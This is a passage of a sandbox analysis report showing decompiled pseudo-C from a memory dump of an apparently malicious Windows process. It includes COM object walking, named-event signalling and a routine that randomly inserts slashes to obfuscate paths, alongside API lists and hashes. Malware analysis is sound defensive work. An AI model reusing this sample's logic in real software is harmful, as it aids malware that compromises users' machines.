            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
            							_t87 = __imp__#6;
            							_t118 = _t61;
            							if(_t118 >= 0) {
            								_t63 = _v24;
            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
            								if(_t118 >= 0) {
            									_t130 = _v20;
            									if(_t130 != 0) {
            										_t67 = 3;
            										_v64 = _t67;
            										_v48 = _t67;
            										_v56 = 0;
            										_v40 = 0;
            										if(_t130 > 0) {
            											while(1) {
            												_t68 = _v24;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t123 = _t123;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
            												if(_t118 < 0) {
            													goto L16;
            												}
            												_t70 = _v8;
            												_t109 =  *0x202a348; // 0xc7d5a8
            												_t28 = _t109 + 0x202b0e4; // 0x3050f1ff
            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
            												if(_t118 >= 0) {
            													_t75 = _v16;
            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
            													if(_t118 >= 0 && _v12 != 0) {
            														_t79 =  *0x202a348; // 0xc7d5a8
            														_t33 = _t79 + 0x202b078; // 0x76006f
            														if(lstrcmpW(_v12, _t33) == 0) {
            															_t83 = _v16;
            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
            														}
            														 *_t87(_v12);
            													}
            													_t77 = _v16;
            													 *((intOrPtr*)( *_t77 + 8))(_t77);
            												}
            												_t72 = _v8;
            												 *((intOrPtr*)( *_t72 + 8))(_t72);
            												_v40 = _v40 + 1;
            												if(_v40 < _v20) {
            													continue;
            												}
            												goto L16;
            											}
            										}
            									}
            								}
            								L16:
            								_t65 = _v24;
            								 *((intOrPtr*)( *_t65 + 8))(_t65);
            							}
            							 *_t87(_v28);
            						}
            						_t58 = _v32;
            						 *((intOrPtr*)( *_t58 + 8))(_t58);
            					}
            				}
            				return _t118;
            			}





































            0x02026ce4
            0x02026ced
            0x02026cee
            0x02026cf2
            0x02026cf8
            0x02026cfe
            0x02026d07
            0x02026d0d
            0x02026d17
            0x02026d19
            0x02026d1f
            0x02026d24
            0x02026d2f
            0x02026d35
            0x02026d3a
            0x02026e5c
            0x02026d40
            0x02026d40
            0x02026d4d
            0x02026d53
            0x02026d59
            0x02026d5d
            0x02026d63
            0x02026d70
            0x02026d74
            0x02026d7a
            0x02026d7d
            0x02026d85
            0x02026d86
            0x02026d8a
            0x02026d8e
            0x02026d91
            0x02026d94
            0x02026d9a
            0x02026da3
            0x02026da9
            0x02026daa
            0x02026dad
            0x02026dae
            0x02026daf
            0x02026db7
            0x02026db8
            0x02026db9
            0x02026dbb
            0x02026dbf
            0x02026dc3
            0x00000000
            0x00000000
            0x02026dc9
            0x02026dd2
            0x02026dd8
            0x02026de2
            0x02026de6
            0x02026de8
            0x02026df5
            0x02026df9
            0x02026e01
            0x02026e06
            0x02026e18
            0x02026e1a
            0x02026e20
            0x02026e20
            0x02026e29
            0x02026e29
            0x02026e2b
            0x02026e31
            0x02026e31
            0x02026e34
            0x02026e3a
            0x02026e3d
            0x02026e46
            0x00000000
            0x00000000
            0x00000000
            0x02026e46
            0x02026d9a
            0x02026d94
            0x02026d7d
            0x02026e4c
            0x02026e4c
            0x02026e52
            0x02026e52
            0x02026e58
            0x02026e58
            0x02026e61
            0x02026e67
            0x02026e67
            0x02026d24
            0x02026e70

            APIs
            • SysAllocString.OLEAUT32(02029284), ref: 02026D2F
            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02026E10
            • SysFreeString.OLEAUT32(00000000), ref: 02026E29
            • SysFreeString.OLEAUT32(?), ref: 02026E58
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$Free$Alloclstrcmp
            • String ID:
            • API String ID: 1885612795-0
            • Opcode ID: 41703b3b282840c803e3ef35dd79b4ed07d138a7f8d0afd50c0ca1878976726c
            • Instruction ID: aa206e021ce9df034bc32d25d737e2b9d99c117eb3470bcdb7a5c2d5b176ea97
            • Opcode Fuzzy Hash: 41703b3b282840c803e3ef35dd79b4ed07d138a7f8d0afd50c0ca1878976726c
            • Instruction Fuzzy Hash: 7D518E71D00619EFCF11DFA8C4889EEB7BAFF88704B244595E915EB210DB32AD45CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(?), ref: 020259B8
            • SysFreeString.OLEAUT32(00000000), ref: 02025A9D
              • Part of subcall function 02026CDF: SysAllocString.OLEAUT32(02029284), ref: 02026D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 02025AF0
            • SysFreeString.OLEAUT32(00000000), ref: 02025AFF
              • Part of subcall function 020277E3: Sleep.KERNEL32(000001F4), ref: 0202782B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafeSleep
            • String ID:
            • API String ID: 3193056040-0
            • Opcode ID: c6a239c2e6ca93b75e55981456a794223d29522cfc26f6aba50eee807113f71a
            • Instruction ID: 1b847cd9615451761df979b5415c07739a4158b5864f4519b91e33d59bfd8fb3
            • Opcode Fuzzy Hash: c6a239c2e6ca93b75e55981456a794223d29522cfc26f6aba50eee807113f71a
            • Instruction Fuzzy Hash: A8516F35900719AFDB16DFA8C884ADEB7B6FF88704F25882AE505DB210DB35DD09CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E02024781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void _v156;
            				void _v428;
            				void* _t55;
            				unsigned int _t56;
            				signed int _t66;
            				signed int _t74;
            				void* _t76;
            				signed int _t79;
            				void* _t81;
            				void* _t92;
            				void* _t96;
            				signed int* _t99;
            				signed int _t101;
            				signed int _t103;
            				void* _t107;
            
            				_t92 = _a12;
            				_t101 = __eax;
            				_t55 = E020261EF(_a16, _t92);
            				_t79 = _t55;
            				if(_t79 == 0) {
            					L18:
            					return _t55;
            				}
            				_t56 =  *(_t92 + _t79 * 4 - 4);
            				_t81 = 0;
            				_t96 = 0x20;
            				if(_t56 == 0) {
            					L4:
            					_t97 = _t96 - _t81;
            					_v12 = _t96 - _t81;
            					E02026725(_t79,  &_v428);
            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02027477(_t101,  &_v428, _a8, _t96 - _t81);
            					E02027477(_t79,  &_v156, _a12, _t97);
            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
            					_t66 = E02026725(_t101, 0x202a1d0);
            					_t103 = _t101 - _t79;
            					_a8 = _t103;
            					if(_t103 < 0) {
            						L17:
            						E02026725(_a16, _a4);
            						E02027894(_t79,  &_v428, _a4, _t97);
            						memset( &_v428, 0, 0x10c);
            						_t55 = memset( &_v156, 0, 0x84);
            						goto L18;
            					}
            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
            					do {
            						if(_v8 != 0xffffffff) {
            							_push(1);
            							_push(0);
            							_push(0);
            							_push( *_t99);
            							L020282DA();
            							_t74 = _t66 +  *(_t99 - 4);
            							asm("adc edx, esi");
            							_push(0);
            							_push(_v8 + 1);
            							_push(_t92);
            							_push(_t74);
            							L020282D4();
            							if(_t92 > 0 || _t74 > 0xffffffff) {
            								_t74 = _t74 | 0xffffffff;
            								_v16 = _v16 & 0x00000000;
            							}
            						} else {
            							_t74 =  *_t99;
            						}
            						_t106 = _t107 + _a8 * 4 - 0x1a8;
            						_a12 = _t74;
            						_t76 = E02025F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
            						while(1) {
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							L13:
            							_t92 =  &_v156;
            							if(E02026E71(_t79, _t92, _t106) < 0) {
            								break;
            							}
            							L14:
            							_a12 = _a12 + 1;
            							_t76 = E020210A0(_t79,  &_v156, _t106, _t106);
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							goto L13;
            						}
            						_a8 = _a8 - 1;
            						_t66 = _a12;
            						_t99 = _t99 - 4;
            						 *(0x202a1d0 + _a8 * 4) = _t66;
            					} while (_a8 >= 0);
            					_t97 = _v12;
            					goto L17;
            				}
            				while(_t81 < _t96) {
            					_t81 = _t81 + 1;
            					_t56 = _t56 >> 1;
            					if(_t56 != 0) {
            						continue;
            					}
            					goto L4;
            				}
            				goto L4;
            			}





















            0x02024784
            0x02024790
            0x02024796
            0x0202479b
            0x0202479f
            0x02024911
            0x02024915
            0x02024915
            0x020247a5
            0x020247a9
            0x020247ad
            0x020247b0
            0x020247bb
            0x020247c1
            0x020247c6
            0x020247c9
            0x020247e3
            0x020247f2
            0x020247fe
            0x02024808
            0x0202480d
            0x0202480f
            0x02024812
            0x020248c9
            0x020248cf
            0x020248e0
            0x020248f3
            0x02024909
            0x00000000
            0x0202490e
            0x0202481b
            0x02024822
            0x02024826
            0x0202482c
            0x0202482e
            0x02024830
            0x02024832
            0x02024834
            0x0202483e
            0x02024843
            0x02024845
            0x02024847
            0x02024848
            0x02024849
            0x0202484a
            0x02024851
            0x02024858
            0x0202485b
            0x0202485b
            0x02024828
            0x02024828
            0x02024828
            0x02024863
            0x0202486b
            0x02024877
            0x0202487c
            0x0202487c
            0x02024881
            0x00000000
            0x00000000
            0x02024883
            0x02024886
            0x02024893
            0x00000000
            0x00000000
            0x02024895
            0x02024895
            0x020248a2
            0x0202487c
            0x02024881
            0x00000000
            0x00000000
            0x00000000
            0x02024881
            0x020248ac
            0x020248af
            0x020248b2
            0x020248b9
            0x020248b9
            0x020248c6
            0x00000000
            0x020248c6
            0x020247b2
            0x020247b6
            0x020247b7
            0x020247b9
            0x00000000
            0x00000000
            0x00000000
            0x020247b9
            0x00000000

            APIs
            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02024834
            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0202484A
            • memset.NTDLL ref: 020248F3
            • memset.NTDLL ref: 02024909
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: memset$_allmul_aulldiv
            • String ID:
            • API String ID: 3041852380-0
            • Opcode ID: 69bb8baa51ecd39a9ebab3ccefeb957d78d27023ffb835e445bcf3ced2c847fc
            • Instruction ID: 367414c7f5dcfe95f11f6346b2c9c02bd5a45f50feb2197fb1ee49f3c56d7b8a
            • Opcode Fuzzy Hash: 69bb8baa51ecd39a9ebab3ccefeb957d78d27023ffb835e445bcf3ced2c847fc
            • Instruction Fuzzy Hash: 6A418271A00369AFDB119F68DC80BEE77B5EF45310F00456AE919A7280EB70AA58DF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E020249D0(signed int _a4, signed int* _a8) {
            				void* __ecx;
            				void* __edi;
            				signed int _t6;
            				intOrPtr _t8;
            				intOrPtr _t12;
            				short* _t19;
            				void* _t25;
            				signed int* _t28;
            				CHAR* _t30;
            				long _t31;
            				intOrPtr* _t32;
            
            				_t6 =  *0x202a310; // 0xd448b889
            				_t32 = _a4;
            				_a4 = _t6 ^ 0x109a6410;
            				_t8 =  *0x202a348; // 0xc7d5a8
            				_t3 = _t8 + 0x202b7b4; // 0x61636f4c
            				_t25 = 0;
            				_t30 = E020274EC(_t3, 1);
            				if(_t30 != 0) {
            					_t25 = CreateEventA(0x202a34c, 1, 0, _t30);
            					E020261DA(_t30);
            				}
            				_t12 =  *0x202a2fc; // 0x2000000a
            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E020230D5() != 0) {
            					L12:
            					_t28 = _a8;
            					if(_t28 != 0) {
            						 *_t28 =  *_t28 | 0x00000001;
            					}
            					_t31 = E020237DF(_t32, 0);
            					if(_t31 == 0 && _t25 != 0) {
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            					}
            					if(_t28 != 0 && _t31 != 0) {
            						 *_t28 =  *_t28 & 0xfffffffe;
            					}
            					goto L20;
            				} else {
            					_t19 =  *0x202a124( *_t32, 0x20);
            					if(_t19 != 0) {
            						 *_t19 = 0;
            						_t19 = _t19 + 2;
            					}
            					_t31 = E020223C4(0,  *_t32, _t19, 0);
            					if(_t31 == 0) {
            						if(_t25 == 0) {
            							L22:
            							return _t31;
            						}
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            						if(_t31 == 0) {
            							L20:
            							if(_t25 != 0) {
            								CloseHandle(_t25);
            							}
            							goto L22;
            						}
            					}
            					goto L12;
            				}
            			}














            0x020249d1
            0x020249d8
            0x020249e2
            0x020249e6
            0x020249ec
            0x020249fb
            0x02024a02
            0x02024a06
            0x02024a18
            0x02024a1a
            0x02024a1a
            0x02024a1f
            0x02024a26
            0x02024a7d
            0x02024a7d
            0x02024a83
            0x02024a85
            0x02024a85
            0x02024a8f
            0x02024a93
            0x02024aa5
            0x02024aa5
            0x02024aa9
            0x02024aaf
            0x02024aaf
            0x00000000
            0x02024a3f
            0x02024a44
            0x02024a4c
            0x02024a50
            0x02024a54
            0x02024a54
            0x02024a61
            0x02024a65
            0x02024a69
            0x02024abe
            0x02024ac4
            0x02024ac4
            0x02024a77
            0x02024a7b
            0x02024ab2
            0x02024ab4
            0x02024ab7
            0x02024ab7
            0x00000000
            0x02024ab4
            0x02024a7b
            0x00000000
            0x02024a65

            APIs
              • Part of subcall function 020274EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02CA9E18,00000000,?,?,43175AC3,00000005,0202A00C,4D283A53,?,?), ref: 02027522
              • Part of subcall function 020274EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02027546
              • Part of subcall function 020274EC: lstrcat.KERNEL32(00000000,00000000), ref: 0202754E
            • CreateEventA.KERNEL32(0202A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02026A95,?,?,?), ref: 02024A11
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,02026A95,00000000,00000000,?,00000000,?,02026A95,?,?,?), ref: 02024A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02026A95,?,?,?), ref: 02024A9F
            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02026A95,?,?,?), ref: 02024AB7
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: 51692632fde9a202c153043e21986782e693403f84be144366c8e0d29c09b3bb
            • Instruction ID: f0aa9c2e1f3e0d534848ec538a453fc7467984274e0f68e8c9706d2061ce8030
            • Opcode Fuzzy Hash: 51692632fde9a202c153043e21986782e693403f84be144366c8e0d29c09b3bb
            • Instruction Fuzzy Hash: 6C21B632A403755BC7729A689C84AAF73E9FB48719F260627FE55DB140DB24C80CBB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E020269E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
            				intOrPtr _v12;
            				void* _v16;
            				void* _v28;
            				char _v32;
            				void* __esi;
            				void* _t29;
            				void* _t38;
            				signed int* _t39;
            				void* _t40;
            
            				_t36 = __ecx;
            				_v32 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v12 = _a4;
            				_t38 = E02022A3D(__ecx,  &_v32);
            				if(_t38 != 0) {
            					L12:
            					_t39 = _a8;
            					L13:
            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
            						_t23 =  &(_t39[1]);
            						if(_t39[1] != 0) {
            							E020228B3(_t23);
            						}
            					}
            					return _t38;
            				}
            				if(E02026ADC(0x40,  &_v16) != 0) {
            					_v16 = 0;
            				}
            				_t40 = CreateEventA(0x202a34c, 1, 0,  *0x202a3e4);
            				if(_t40 != 0) {
            					SetEvent(_t40);
            					Sleep(0xbb8);
            					CloseHandle(_t40);
            				}
            				_push( &_v32);
            				if(_a12 == 0) {
            					_t29 = E02025704(_t36);
            				} else {
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_t29 = E02024C94(_t36);
            				}
            				_t41 = _v16;
            				_t38 = _t29;
            				if(_v16 != 0) {
            					E02027220(_t41);
            				}
            				if(_t38 != 0) {
            					goto L12;
            				} else {
            					_t39 = _a8;
            					_t38 = E020249D0( &_v32, _t39);
            					goto L13;
            				}
            			}












            0x020269e6
            0x020269f3
            0x020269f9
            0x020269fa
            0x020269fb
            0x020269fc
            0x020269fd
            0x02026a01
            0x02026a0d
            0x02026a11
            0x02026a99
            0x02026a99
            0x02026a9c
            0x02026a9e
            0x02026aa6
            0x02026aac
            0x02026aaf
            0x02026aaf
            0x02026aac
            0x02026aba
            0x02026aba
            0x02026a24
            0x02026a26
            0x02026a26
            0x02026a3d
            0x02026a41
            0x02026a44
            0x02026a4f
            0x02026a56
            0x02026a56
            0x02026a5f
            0x02026a63
            0x02026a71
            0x02026a65
            0x02026a65
            0x02026a66
            0x02026a67
            0x02026a68
            0x02026a69
            0x02026a6a
            0x02026a6a
            0x02026a76
            0x02026a79
            0x02026a7d
            0x02026a7f
            0x02026a7f
            0x02026a86
            0x00000000
            0x02026a88
            0x02026a88
            0x02026a95
            0x00000000
            0x02026a95

            APIs
            • CreateEventA.KERNEL32(0202A34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 02026A37
            • SetEvent.KERNEL32(00000000), ref: 02026A44
            • Sleep.KERNEL32(00000BB8), ref: 02026A4F
            • CloseHandle.KERNEL32(00000000), ref: 02026A56
              • Part of subcall function 02025704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02026A76,?,02026A76,?,?,?,?,?,02026A76,?), ref: 020257DE
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: 96a7157deee247dfd3d7f19e861a089d6fbdeafbd701a4bef05b91e25cd639e2
            • Instruction ID: b84fbadac6fffc8a4fd49b9d64895b49cf552d6e2c6ed5e00225fcc0537277f2
            • Opcode Fuzzy Hash: 96a7157deee247dfd3d7f19e861a089d6fbdeafbd701a4bef05b91e25cd639e2
            • Instruction Fuzzy Hash: B2215372D00339AFDB21AFE498849EE77EDAB04314B158427EA11A7100D736998D9FA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E02024461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
            				intOrPtr _v8;
            				void* _v12;
            				void* _v16;
            				intOrPtr _t26;
            				intOrPtr* _t28;
            				intOrPtr _t31;
            				intOrPtr* _t32;
            				void* _t39;
            				int _t46;
            				intOrPtr* _t47;
            				int _t48;
            
            				_t47 = __eax;
            				_push( &_v12);
            				_push(__eax);
            				_t39 = 0;
            				_t46 = 0;
            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
            				_v8 = _t26;
            				if(_t26 < 0) {
            					L13:
            					return _v8;
            				}
            				if(_v12 == 0) {
            					Sleep(0xc8);
            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
            				}
            				if(_v8 >= _t39) {
            					_t28 = _v12;
            					if(_t28 != 0) {
            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
            						_v8 = _t31;
            						if(_t31 >= 0) {
            							_t46 = lstrlenW(_v16);
            							if(_t46 != 0) {
            								_t46 = _t46 + 1;
            								_t48 = _t46 + _t46;
            								_t39 = E020233DC(_t48);
            								if(_t39 == 0) {
            									_v8 = 0x8007000e;
            								} else {
            									memcpy(_t39, _v16, _t48);
            								}
            								__imp__#6(_v16);
            							}
            						}
            						_t32 = _v12;
            						 *((intOrPtr*)( *_t32 + 8))(_t32);
            					}
            					 *_a4 = _t39;
            					 *_a8 = _t46 + _t46;
            				}
            				goto L13;
            			}














            0x0202446d
            0x02024471
            0x02024472
            0x02024473
            0x02024475
            0x02024477
            0x0202447a
            0x0202447f
            0x02024516
            0x0202451d
            0x0202451d
            0x02024488
            0x0202448f
            0x0202449f
            0x0202449f
            0x020244a5
            0x020244a7
            0x020244ac
            0x020244b5
            0x020244bb
            0x020244c0
            0x020244cb
            0x020244cf
            0x020244d1
            0x020244d2
            0x020244db
            0x020244df
            0x020244f0
            0x020244e1
            0x020244e6
            0x020244eb
            0x020244fa
            0x020244fa
            0x020244cf
            0x02024500
            0x02024506
            0x02024506
            0x0202450f
            0x02024514
            0x02024514
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: b9820373a85907152d2fbb52b53cedcc156daaf0439571ac874a83afb0fc041c
            • Instruction ID: 862f86f7e2f7c2915423695b1eb42475a558eeb23fef041512b275789d2b7555
            • Opcode Fuzzy Hash: b9820373a85907152d2fbb52b53cedcc156daaf0439571ac874a83afb0fc041c
            • Instruction Fuzzy Hash: 08213E75900329EFCB11DFA4D9849DEBBF9FF48314B20856AE94597200EB34DA09DF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E02022708(unsigned int __eax, void* __ecx) {
            				void* _v8;
            				void* _v12;
            				signed int _t21;
            				signed short _t23;
            				char* _t27;
            				void* _t29;
            				void* _t30;
            				unsigned int _t33;
            				void* _t37;
            				unsigned int _t38;
            				void* _t41;
            				void* _t42;
            				int _t45;
            				void* _t46;
            
            				_t42 = __eax;
            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
            				_t38 = __eax;
            				_t30 = RtlAllocateHeap( *0x202a2d8, 0, (__eax >> 3) + __eax + 1);
            				_v12 = _t30;
            				if(_t30 != 0) {
            					_v8 = _t42;
            					do {
            						_t33 = 0x18;
            						if(_t38 <= _t33) {
            							_t33 = _t38;
            						}
            						_t21 =  *0x202a2f0; // 0xa0551a04
            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
            						 *0x202a2f0 = _t23;
            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
            						memcpy(_t30, _v8, _t45);
            						_v8 = _v8 + _t45;
            						_t27 = _t30 + _t45;
            						_t38 = _t38 - _t45;
            						_t46 = _t46 + 0xc;
            						 *_t27 = 0x2f;
            						_t13 = _t27 + 1; // 0x1
            						_t30 = _t13;
            					} while (_t38 > 8);
            					memcpy(_t30, _v8, _t38 + 1);
            				}
            				return _v12;
            			}

















            0x02022710
            0x02022713
            0x02022719
            0x02022731
            0x02022733
            0x02022738
            0x0202273a
            0x0202273d
            0x0202273f
            0x02022742
            0x02022744
            0x02022744
            0x02022746
            0x02022751
            0x02022756
            0x02022767
            0x0202276f
            0x02022774
            0x02022777
            0x0202277a
            0x0202277c
            0x0202277f
            0x02022782
            0x02022782
            0x02022785
            0x02022790
            0x02022795
            0x0202279f

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02026708,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02022713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0202272B
            • memcpy.NTDLL(00000000,02CA9600,-00000008,?,?,?,02026708,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 0202276F
            • memcpy.NTDLL(00000001,02CA9600,00000001,02023ECE,00000000,02CA9600), ref: 02022790
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: 9c4d2329331fe9ccd1a8f9c05a9bbd12471309d7c52c62826c5c105b0b6823f3
            • Instruction ID: fda6a28351883be965607d3bc19264c1ebc50b0eb05dbca35ddc111d1921000d
            • Opcode Fuzzy Hash: 9c4d2329331fe9ccd1a8f9c05a9bbd12471309d7c52c62826c5c105b0b6823f3
            • Instruction Fuzzy Hash: 00110672A00328AFD7248AA9DC84D9E7BFEEB90360B250177F804D7140EB759E1897A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E020223C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				intOrPtr _v36;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				void _v60;
            				char _v64;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				intOrPtr _t26;
            				intOrPtr _t27;
            				long _t28;
            
            				_t27 = __edi;
            				_t26 = _a8;
            				_t28 = E02023A63(_a4, _t26, __edi);
            				if(_t28 != 0) {
            					memset( &_v60, 0, 0x38);
            					_t18 =  *0x202a348; // 0xc7d5a8
            					_t28 = 0;
            					_v64 = 0x3c;
            					if(_a12 == 0) {
            						_t7 = _t18 + 0x202b50c; // 0x70006f
            						_t19 = _t7;
            					} else {
            						_t6 = _t18 + 0x202b8d8; // 0x750072
            						_t19 = _t6;
            					}
            					_v52 = _t19;
            					_push(_t28);
            					_v48 = _a4;
            					_v44 = _t26;
            					_v36 = _t27;
            					E02025B56();
